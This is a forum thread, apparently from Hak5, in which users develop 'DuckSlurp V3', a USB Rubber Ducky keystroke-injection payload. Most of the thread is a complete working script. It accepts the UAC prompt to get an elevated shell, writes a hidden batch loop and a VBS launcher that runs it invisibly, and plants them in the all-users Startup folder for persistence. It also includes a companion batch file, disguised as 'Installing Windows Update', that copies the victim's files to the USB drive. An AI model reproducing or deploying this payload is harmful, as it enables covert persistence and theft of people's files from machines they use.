Jump to content

DuckSlurp V2.1?


Recommended Posts

I just had an idea that came from one of the Hak5 episodes about the Ducky, Darren mentioned something about having the DuckyWait.bat always running so you could just come by and plug in the DUCKY USB (Not the actual Ducky) and it would copy all of the files you told it to without running the Ducky everytime. From what I can see it would only take one change in the coding of DuckSlurp V2.

REM *** Change directories because System32 appears to be protected. ***
STRING CD %TEMP%
ENTER

Just change "%TEMP%" to "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" and it will create the DuckyWait.bat in the startup folder so everytime the computer is restarted, so is the DuckyWait.bat. What do you guys think?

Link to comment
Share on other sites

  • 4 weeks later...

I suppose you could use the firmware which only runs when you tap the button, thereby only running the payload when you actually need to. You could also put an if statement in duck slurp which prevents overwriting the duck slurp payload if it already exists (I would kill for a ducky case which has a button on it so I didn't have to take it out of the case every time I wanted to tap the button). The if statement wouldn't be surreptitious though if you wanted to plug in the duck while the user was looking. Now the problem with moving a batch file to the start-up folder is that you cannot tell the batch file to run invisibly, Windows automatically runs everything in the start-up folder. what is needed is some indirection whereby the duck slurp is somewhere else, and only a small start-up command is present in the start-up folder. The "invis.vbs" call and "wscript.exe" needs included in whatever batch file is resident there. If there was only one batch file in the start-up folder then you would essentially have a black box (dos box) appear at start-up, then exit it's self or something. I would have to do some tinkering to see if this would work. The problem is you have to be very specific in order to make batch files run silently on Windows Vista/7.

Link to comment
Share on other sites

Better make it V3. The following should work. So a cmd window will pop up on reboot, but it exits almost instantly, kicking off the batch process. You could do the same thing with registry keys, and one less file, but I think this way there are less assumptions about having admin access.

REM Author: overwraith modified by dkitchen
REM Name: DuckSlurp_V3.txt
REM Purpose: Duck Slurp payload, copy files off of the host computer. 
REM Encoder V2.4+
REM Using the run command for a broader OS base. 

REM *** Initial Delay *** 
DELAY 2000

REM *** Bypass UAC ***
GUI r
DELAY 250
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500


REM *** Change directories because System32 appears to be protected. ***
STRING CD %TEMP%
ENTER

REM *** Delete wait batch file if already exists ***
STRING erase /Q DuckyWait.bat
ENTER

REM *** Make batch file that waits for SD card to mount. ***
STRING copy con DuckyWait.bat
ENTER
STRING :while1
ENTER
STRING @echo off
ENTER
STRING :while1
ENTER
REM *** Find the DUCKY drive ***
STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( 
ENTER
STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do (
ENTER
STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" )
ENTER
STRING )
ENTER
STRING )
ENTER
STRING if [%DuckyDrive%] EQU [] (
ENTER
STRING timeout /t 3
ENTER
STRING goto :while1 
ENTER
STRING ) else (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 3
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
STRING set DuckyDrive=%DuckyDrive%\DuckSlurp\
ENTER
STRING Start %DuckyDrive%\DuckSlurp.bat
ENTER
CONTROL z
ENTER

REM *** Delete Invisible vbs file if already exists ***
STRING erase /Q invis.vbs
ENTER

REM *** Make VBS file to run invisibly ***
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM *** Change directories to startup folder ***
STRING cd "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
ENTER

REM *** Delete program start if already exists ***
STRING erase /Q SlurpStart.bat
ENTER

REM *** Make batch file that starts from the startup folder ***
STRING copy con SlurpStart.bat
ENTER
REM *** Run the batch file invisibly ***
STRING start wscript.exe %TEMP%\invis.vbs %TEMP%\DuckyWait.bat >>nul
ENTER
STRING exit
ENTER
CONTROL z
ENTER

REM *** Start the slurp program ***
STRING SlurpStart.bat
ENTER


REM *** Exit ***
STRING EXIT
ENTER

Here is the DuckSlurp.bat file which should reside on your exfil- drive.

@echo off
@echo Installing Windows Update
set destination=%~d0\DuckSlurp\%COMPUTERNAME%
mkdir %destination%

if Exist %USERPROFILE%\Documents (
xcopy %USERPROFILE%\Desktop\EvilPlans %destination% >>nul
)

@cls
@exit

Of course you would substitute the directory path with the files you would like to copy off the computer, perhaps a loop which loops through the directories, copying certain extensions etc.

PS. This version has the DuckSlurp.bat file running so that it can be seen so that you know when all the files are done copying, replace with this line " STRING Start %DuckyDrive%\DuckSlurp.bat " with this one " STRING wscript.exe %TEMP%\invis.vbs %DUCKYdrive%\DuckSlurp.bat " to make it silent again (remove outer quotes).

Edited by overwraith
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...